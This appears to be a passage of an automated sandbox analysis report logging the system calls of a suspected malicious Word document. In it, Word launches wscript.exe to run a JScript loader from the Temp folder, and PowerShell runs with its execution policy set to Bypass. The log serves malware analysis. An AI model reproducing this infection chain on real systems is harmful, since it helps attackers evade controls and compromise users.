Environment	Get Environment String	name = MshEnableTrace	13	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Read	size = 4096, size_out = 4096	5	Fn Data
File	Read	size = 4096, size_out = 2530	1	Fn Data
File	Read	size = 542, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn

Thread 0xa20

35

0

»

Category	Operation	Information	Success	Count	Logfile

Process #24: wscript.exe

179

0

»

Information	Value
ID	#24
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:22, Reason: Child Process
Unmonitor	End Time: 00:01:33, Reason: Self Terminated
Monitor Duration	00:00:10

OS Process Information

»

Information	Value
PID	0xb14
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B28 0x 9FC 0x 40C 0x B0C 0x 9EC 0x A00 0x 500 0x 70C 0x 820 0x B00

Threads

Thread 0xb28

178

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:25 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 153114	1	Fn
System	Get Time	type = Performance Ctr, time = 20740044401	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff6b0000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:26 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 154128	1	Fn
System	Get Time	type = Performance Ctr, time = 20841242208	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7fefd72c480	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 154144	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = ô"	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:26 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 154253	1	Fn
System	Get Time	type = Performance Ctr, time = 20853604560	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:26 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 154253	1	Fn
System	Get Time	type = Performance Ctr, time = 20854550335	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 155579	1	Fn
System	Get Time	type = Ticks, time = 156266	1	Fn
System	Get Time	type = Ticks, time = 156297	1	Fn
System	Get Time	type = Ticks, time = 157108	3	Fn
System	Get Time	type = Ticks, time = 157124	1	Fn
System	Get Time	type = Ticks, time = 157233	4	Fn
System	Get Time	type = Ticks, time = 157249	3	Fn
System	Get Time	type = Ticks, time = 157264	2	Fn
System	Get Time	type = Ticks, time = 157358	1	Fn
System	Get Time	type = Ticks, time = 157373	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Time	type = Ticks, time = 157389	1	Fn
System	Get Time	type = Ticks, time = 157576	3	Fn
System	Get Time	type = Ticks, time = 157592	1	Fn
System	Get Time	type = Ticks, time = 157607	1	Fn
System	Get Time	type = Ticks, time = 157732	2	Fn
System	Get Time	type = Ticks, time = 157748	1	Fn
System	Get Time	type = Ticks, time = 157951	3	Fn
System	Get Time	type = Ticks, time = 158138	1	Fn
System	Get Time	type = Ticks, time = 158294	1	Fn
System	Get Time	type = Ticks, time = 158309	5	Fn
System	Get Time	type = Ticks, time = 158325	2	Fn
System	Get Time	type = Ticks, time = 158387	1	Fn
System	Get Time	type = Ticks, time = 158403	1	Fn
System	Get Time	type = Ticks, time = 158419	2	Fn
System	Get Time	type = Ticks, time = 158434	1	Fn
System	Get Time	type = Ticks, time = 158481	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefea62e18	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:30 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 158481	1	Fn
System	Get Time	type = Performance Ctr, time = 21280522663	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff6b0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wscript.exe, function = 1, address_out = 0xff6bd7f8	1	Fn
System	Get Time	type = Ticks, time = 158497	3	Fn
System	Get Time	type = Ticks, time = 158699	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x40c

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 3168864		1	Fn

Process #25: wscript.exe

158

0

»

Information	Value
ID	#25
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:28, Reason: Child Process
Unmonitor	End Time: 00:01:36, Reason: Self Terminated
Monitor Duration	00:00:08

OS Process Information

»

Information	Value
PID	0x154
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B9C 0x 210 0x 4D8 0x 248 0x 8CC 0x 4B4 0x B6C 0x C0 0x 4F4 0x 89C

Threads

Thread 0xb9c

157

0

»

Category	Operation	Information	Count	Logfile
